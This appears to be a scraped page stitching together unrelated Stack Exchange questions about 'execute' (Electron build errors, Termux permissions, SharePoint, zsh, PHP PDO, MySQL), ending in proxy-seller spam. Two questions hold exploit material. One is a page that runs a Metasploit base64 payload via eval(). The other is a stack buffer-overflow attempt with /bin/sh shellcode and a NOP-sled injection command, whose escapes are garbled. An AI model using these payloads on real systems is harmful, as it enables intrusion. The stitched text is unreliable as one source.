metasploit – How do you execute a base64 payload

metasploit – How do you execute a base64 payload – Information Security Stack Exchange

How do you execute payloads with javascript?

Is it possible to execute payloads with javascript in the browser

According to this question you can execute base64 code

index.html

<html>
<script>
var encoded = "base64 payload goes here";
var decodedString = atob(encoded);
eval(decodedString);
</script> 
</html>
         

When you check the console in developer tools you get the following error
Uncaught SyntaxError: illegal character

To generate the payload I used metasploit.
I tried using the format js_le with unescape() but this also was not successful.

javascript – cannot execute cause=exit status 1 errorOut on elenctron

Hello i need you help please, i’m create an app desktop using electron and react, the app is simple, use 2 routes, and are 2 components, one Home, and one GamePanel, this is not the error because the got not erros in linux build but got this error in windows build,i use the electron-react-boilerplate, and when i run yarn package to build, return this error:

⨯ cannot execute  cause=exit status 1
                    errorOut=003c:err:service:process_send_command service protocol error - failed to write pipe!
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"PlugPlay" failed to start: 1053
    0078:fixme:ntoskrnl:MmGetSystemRoutineAddress L"EtwRegisterClassicProvider" not found
    0078:fixme:ntoskrnl:IoWMIRegistrationControl (000000014000A640 2147549185) stub
    wine: Call from 000000007B01135E to unimplemented function ndis.sys.NdisInitializeReadWriteLock, aborting
    wine: Unimplemented function ndis.sys.NdisInitializeReadWriteLock called at address 000000007B01135E (thread 0078), starting debugger...
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0084:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    005c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    005c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0084:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0090:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0090:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    003c:err:service:process_send_command service protocol error - failed to read pipe r = 0  count = 0!
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"RvNetMP60" failed to start: 1053
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    INTEL-MESA: warning: Ivy Bridge Vulkan support is incomplete
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    Reserved header is not 0 or image type is not icon for '/home/luan/�rea de Trabalho/Projetos/footnet-electron/assets/icon.ico'
    Fatal error: Unable to set icon
    0024:fixme:ver:GetCurrentPackageId (0031FE94 00000000): stub
    
                    command=wine /home/luan/.cache/electron-builder/winCodeSign/winCodeSign-2.6.0/rcedit-ia32.exe '/home/luan/Área de Trabalho/Projetos/footnet-electron/release/win-unpacked/FootNet.exe' --set-version-string FileDescription FootNet --set-version-string ProductName FootNet --set-version-string LegalCopyright 'Copyright © 2021 Rafael Finger Lnez' --set-file-version 0.0.1 --set-product-version 0.0.1.0 --set-version-string InternalName FootNet --set-version-string OriginalFilename '' --set-version-string CompanyName 'Rafael Finger Lnez' --set-icon '/home/luan/Área de Trabalho/Projetos/footnet-electron/assets/icon.ico'
                    workingDir=
  • Above command failed, retrying 3 more times
  ⨯ cannot execute  cause=exit status 1
                    errorOut=0054:err:ntdll:RtlpWaitForCriticalSection section 000000007BC69540 "dlls/ntdll/loader.c: loader_section" wait timed out in thread 0054, blocked by 005c, retrying (60 sec)
    003c:err:service:process_send_command receiving command result timed out
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"NDIS" failed to start: 1053
    005c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0064:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0064:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    005c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0074:fixme:service:service_control_dispatcher failed to open service L""
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"PlugPlay" failed to start: 1052
    0084:fixme:ntoskrnl:MmGetSystemRoutineAddress L"EtwRegisterClassicProvider" not found
    0084:fixme:ntoskrnl:IoWMIRegistrationControl (000000014000A640 2147549185) stub
    wine: Call from 000000007B01135E to unimplemented function ndis.sys.NdisInitializeReadWriteLock, aborting
    wine: Unimplemented function ndis.sys.NdisInitializeReadWriteLock called at address 000000007B01135E (thread 0084), starting debugger...
    0090:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0090:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0098:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0098:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    003c:err:service:process_send_command service protocol error - failed to read pipe r = 0  count = 0!
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"RvNetMP60" failed to start: 1053
    INTEL-MESA: warning: Ivy Bridge Vulkan support is incomplete
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    Reserved header is not 0 or image type is not icon for '/home/luan/�rea de Trabalho/Projetos/footnet-electron/assets/icon.ico'
    Fatal error: Unable to set icon
    0024:fixme:ver:GetCurrentPackageId (0031FE94 00000000): stub
    
                    command=wine /home/luan/.cache/electron-builder/winCodeSign/winCodeSign-2.6.0/rcedit-ia32.exe '/home/luan/Área de Trabalho/Projetos/footnet-electron/release/win-unpacked/FootNet.exe' --set-version-string FileDescription FootNet --set-version-string ProductName FootNet --set-version-string LegalCopyright 'Copyright © 2021 Rafael Finger Lnez' --set-file-version 0.0.1 --set-product-version 0.0.1.0 --set-version-string InternalName FootNet --set-version-string OriginalFilename '' --set-version-string CompanyName 'Rafael Finger Lnez' --set-icon '/home/luan/Área de Trabalho/Projetos/footnet-electron/assets/icon.ico'
                    workingDir=
  • Above command failed, retrying 2 more times
  ⨯ cannot execute  cause=exit status 1
                    errorOut=0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0064:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0064:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    005c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    005c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0084:fixme:ntoskrnl:MmGetSystemRoutineAddress L"EtwRegisterClassicProvider" not found
    0084:fixme:ntoskrnl:IoWMIRegistrationControl (000000014000A640 2147549185) stub
    wine: Call from 000000007B01135E to unimplemented function ndis.sys.NdisInitializeReadWriteLock, aborting
    wine: Unimplemented function ndis.sys.NdisInitializeReadWriteLock called at address 000000007B01135E (thread 0084), starting debugger...
    0094:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0094:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    00a0:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    00a0:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    003c:err:service:process_send_command service protocol error - failed to read pipe r = 0  count = 0!
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"RvNetMP60" failed to start: 1053
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    INTEL-MESA: warning: Ivy Bridge Vulkan support is incomplete
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    Reserved header is not 0 or image type is not icon for '/home/luan/�rea de Trabalho/Projetos/footnet-electron/assets/icon.ico'
    Fatal error: Unable to set icon
    0024:fixme:ver:GetCurrentPackageId (0031FE94 00000000): stub
    
                    command=wine /home/luan/.cache/electron-builder/winCodeSign/winCodeSign-2.6.0/rcedit-ia32.exe '/home/luan/Área de Trabalho/Projetos/footnet-electron/release/win-unpacked/FootNet.exe' --set-version-string FileDescription FootNet --set-version-string ProductName FootNet --set-version-string LegalCopyright 'Copyright © 2021 Rafael Finger Lnez' --set-file-version 0.0.1 --set-product-version 0.0.1.0 --set-version-string InternalName FootNet --set-version-string OriginalFilename '' --set-version-string CompanyName 'Rafael Finger Lnez' --set-icon '/home/luan/Área de Trabalho/Projetos/footnet-electron/assets/icon.ico'
                    workingDir=
  • Above command failed, retrying 1 more times
  ⨯ cannot execute  cause=exit status 1
                    errorOut=0060:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0060:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0068:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0034:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0068:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0088:fixme:ntoskrnl:MmGetSystemRoutineAddress L"EtwRegisterClassicProvider" not found
    0088:fixme:ntoskrnl:IoWMIRegistrationControl (000000014000A640 2147549185) stub
    wine: Call from 000000007B01135E to unimplemented function ndis.sys.NdisInitializeReadWriteLock, aborting
    wine: Unimplemented function ndis.sys.NdisInitializeReadWriteLock called at address 000000007B01135E (thread 0088), starting debugger...
    0094:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0094:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    009c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    009c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    003c:err:service:process_send_command service protocol error - failed to read pipe r = 0  count = 0!
    003c:fixme:service:scmdatabase_autostart_services Auto-start service L"RvNetMP60" failed to start: 1053
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    002c:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    INTEL-MESA: warning: Ivy Bridge Vulkan support is incomplete
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    0024:fixme:font:get_name_record_codepage encoding 20 not handled, platform 1.
    Reserved header is not 0 or image type is not icon for '/home/luan/�rea de Trabalho/Projetos/footnet-electron/assets/icon.ico'
    Fatal error: Unable to set icon
    0024:fixme:ver:GetCurrentPackageId (0031FE94 00000000): stub
    
                    command=wine /home/luan/.cache/electron-builder/winCodeSign/winCodeSign-2.6.0/rcedit-ia32.exe '/home/luan/Área de Trabalho/Projetos/footnet-electron/release/win-unpacked/FootNet.exe' --set-version-string FileDescription FootNet --set-version-string ProductName FootNet --set-version-string LegalCopyright 'Copyright © 2021 Rafael Finger Lnez' --set-file-version 0.0.1 --set-product-version 0.0.1.0 --set-version-string InternalName FootNet --set-version-string OriginalFilename '' --set-version-string CompanyName 'Rafael Finger Lnez' --set-icon '/home/luan/Área de Trabalho/Projetos/footnet-electron/assets/icon.ico'
                    workingDir=
  • Above command failed, retrying 0 more times
error Command failed with exit code 1.

i’am alterate the script package to build for windows an linux, this is my scripts

"scripts": {
    "build": "concurrently "yarn build:main" "yarn build:renderer"",
    "build:main": "cross-env NODE_ENV=production webpack --config ./.erb/configs/webpack.config.main.prod.babel.js",
    "build:renderer": "cross-env NODE_ENV=production webpack --config ./.erb/configs/webpack.config.renderer.prod.babel.js",
    "package": "rm -rf src/dist && yarn build && electron-builder -lw  --publish never ",```
the linux build is ok but the windows occured this error

c – Shell does not execute after buffer overflow

I am trying to do a buffer overflow on 64-bit Kali VM. When I execute the program and inject the NOP sled + shellcode + return address, the shell does not execute. I think it might have something to do with the return address, but i’m not completely sure…

This is the program

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv()) {
        char buffer(256);
        strcpy(buffer, argv(1));

        printf("%sn");

        return 0;
}               

Compiled wtih

gcc strcpy.c -o strcpy -fno-stack-protector -no-pie -z norelro -z execstack

Shellcode:

x31xc0xb0x46x31xdbx31xc9xcdx80xebx16x5bx31xc0x88x43x07x89x5bx08x89x43
x0cxb0x0bx8dx4bx08x8dx53x0cxcdx80xe8xe5xffxffxffx2fx62x69x6ex2fx73x68

The input is 270 bytes = 216 * ‘x90’ + 46 bytes shellcode + 8 bytes of return address

And this is the complete command

r $(python -c "print('x90' * 216 + 'x31xc0xb0x46x31xdbx31xc9xcdx80xebx16x5bx31xc0x88x43x07x89x5bx08x89x43x0cxb0x0bx8dx4bx08x8dx53x0cxcdx80xe8xe5xffxffxffx2fx62x69x6ex2fx73x68' + 'x80xddxffxffxffx7fx00x00')")

Info from gdb

disas main

x/250xb $rs

info registers

As mentioned before, I have suspicion that the return address points to the wrong place but im not sure how to fix that.

Any help would be appreciated 🙂

file permissions – Cxxdroid can execute c++ binary in any internal storage directory, but Termux cannot

I was testing some c++ executable in my old smartphone (Android 8, no root). Here’s the description of the problem:

I have both Termux and Cxxdroid installed in that phone. And in termux, I have clang installed.

Let’s enter Termux.

cd /storage/emulated/0/c++    # current dir is now c++ which sits in the internal storage
ls    # this prints 'hello.cpp', a simple hello world program. let's compile it.
clang++ hello.cxx -o hello
ls    # this prints two files now, hello and hello.cxx. let's execute hello.
./hello    # prints: bash: ./hello: Permission denied. let's grant permission.
chmod +x hello
./hello    # prints: bash: ./hello: Permission denied

As you can see, there’s no way I can execute hello in the c++ directory. I know that if I move hello in $HOME and run it, it would work right away. But that’s not the case.

Now, let’s enter Cxxdroid.
Enter ‘Terminal’ from left menu. Let’s execute our hello binary.

cd /storage/emulated/0/c++
ls    # contains two files. hello.cxx and hello (which is the binary generated from Termux clang). let's run it.
./hello    # prints 'Hello World'

See? The same binary does not run in Termux but runs right away in Cxxdroid. Why? What technique is Cxxdroid using under the hood? Permission of the hello binary for both Termux and Cxxdroid is:

ls -l hello    # prints: -rw-rw---- 1 root everybody 115588 Apr 25 00:32 hello

Any help is appreciated.

sharepoint foundation – The Execute method of job definition Microsoft.Office.Server.UserProfiles.FeedCacheRepopulationJob threw an exception

Please check the ULS log for more detailed information.

If there is any error message in the ULS log related to “No DNS entries exist for…”, if so, verify that the DNS does not in fact exist and then add the appropriate DNS entry for the server.

Reference: The Execute method of job definition Microsoft.Office.Server. UserProfiles .FeedCacheRepopulationJob threw an exception

If the issue exists, try to remove and re-add the Distributed Cache Service:

Stop-SPDistributedCacheServiceInstance
Remove-SPDistributedCacheServiceInstance
Add-SPDistributedCacheServiceInstance

mac – MacOSX Big Sur – Terminal ZSH Shell Command’s Execute Sometimes With “!” Exclamation Symbol In Front

!str Refer to the most recent command starting with str.
this is the history expansion behavior.
type

man zshexpn

and check ‘Event Designators’, you will get the answer

An event designator is a reference to a command-line entry in the history list. In the list below, remember that the initial `!’ in
each item may be changed to another character by setting the histchars parameter.

   !      Start a history expansion, except when followed by a blank, newline, `=' or `('.  If followed immediately by a word designator
          (see the section `Word Designators'), this forms a history reference with no event designator (see the section `Overview').

   !!     Refer to the previous command.  By itself, this expansion repeats the previous command.

   !n     Refer to command-line n.

   !-n    Refer to the current command-line minus n.

   !str   Refer to the most recent command starting with str.

   !?str(?)
          Refer to the most recent command containing str.  The trailing `?' is necessary if this reference is to be followed by a modi-
          fier or followed by any text that is not to be considered part of str.

   !#     Refer  to  the  current command line typed in so far.  The line is treated as if it were complete up to and including the word
          before the one with the `!#' reference.

   !{...} Insulate a history reference from adjacent characters (if necessary).

php – PDODebuguer entrega valor corretamente mas ->execute() não!

me ajudem a entender o que é que estou deixando passar?

Em:

public function findClientDocument(string $document, string $password) : ?array{

    $sql = 'SELECT * FROM ' . $this->table . ' WHERE document = :document AND password = :password';
            
    $find =  $this->pdo->prepare ($sql);

    $find->bindValue(":document", $document);

    $find->bindValue(":password", $password);

        /// pdoDebugger para conferir

    $data = (
        'document' => $document,
        'password' => $password
    );

    var_dump ($this->pdoDebugger->show($sql, $data));

          /// fim do pdoDebugger para conferir

    $find->execute();
            
    echo "<br>";

    var_dump($find);
    
    return  $find->rowCount() === 0
                    ? NULL
                    : $find->fetch(PDO::FETCH_ASSOC);

}

O var_dump ($this->pdoDebugger->show($sql, $data)); entrega uma query que retorna valor corretamente, 1 registro.

string(74) “SELECT * FROM clients WHERE document = ‘99999999999’ AND password = ‘aaaa'”

Mas o $find->rowCount() retorna 0 registros.

Eis o var_dump();

object(PDOStatement)#92 (1) { (“queryString”)=> string(73) “SELECT * FROM clients WHERE document = :document AND password = :password” }

Passing parameters in MySql procedure with prepare execute

I am trying to write a procedure that has a location parameter, this parameter is later used in the queries inside the procedure. Also, I want to be able to limit the query results dynamically.

I have never done anything similar, so I read the appropriate documentation and studied some examples. My code is the following:

DROP PROCEDURE IF EXISTS lower10_avg_price ;
DELIMITER $$    
CREATE procedure lower10_avg_price (loc varchar(45))
BEGIN
SET @a = (SELECT ceil(COUNT(*)/10) FROM UNION_SALES WHERE location = loc and current_Price >5000);

SET @quer = concat(
'SELECT ROUND(avg(prices.price),2)
FROM 
(SELECT current_Price as price FROM UNION_SALES WHERE location = ', loc,' and current_Price >5000
ORDER BY current_Price ASC LIMIT ?) as prices;');

PREPARE STMT FROM @quer;
EXECUTE STMT USING @a;

END $$
DELIMITER ;   

The error I get when I call the procedure is:

CALL lower10_avg_price('Αρχαία Αγορά            ');

Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘Αγορά and current_Price >5000 ORDER BY current_Price ASC LIMIT ‘ at line 3

Can someone please help me understand what is causing this error?
Thank you for any suggestions!

git – How to execute a command automatically based on the result generated by the previous command on command line?

Example usecase:

I have a usecase where I clone Android Studio projects using git clone <urL> and upon cloning I get all folders from a repo including .idea folder.

This .idea folder is located inside repositoryName/.idea generated after git cloning

This .idea folder is not useful for my usecase and most times I have to delete it to import a project into Android Studio otherwise, it shows error.

What is expected:

I expect a command which does this:

Clone a GitHub repo and automatically delete the repositoryName/.idea folder.

Solution could be Windows based or Linux.

DreamProxies - Cheapest USA Elite Private Proxies 100 Private Proxies 200 Private Proxies 400 Private Proxies 1000 Private Proxies 2000 Private Proxies ExtraProxies.com - Buy Cheap Private Proxies Buy 50 Private Proxies Buy 100 Private Proxies Buy 200 Private Proxies Buy 500 Private Proxies Buy 1000 Private Proxies Buy 2000 Private Proxies ProxiesLive Proxies-free.com New Proxy Lists Every Day Proxies123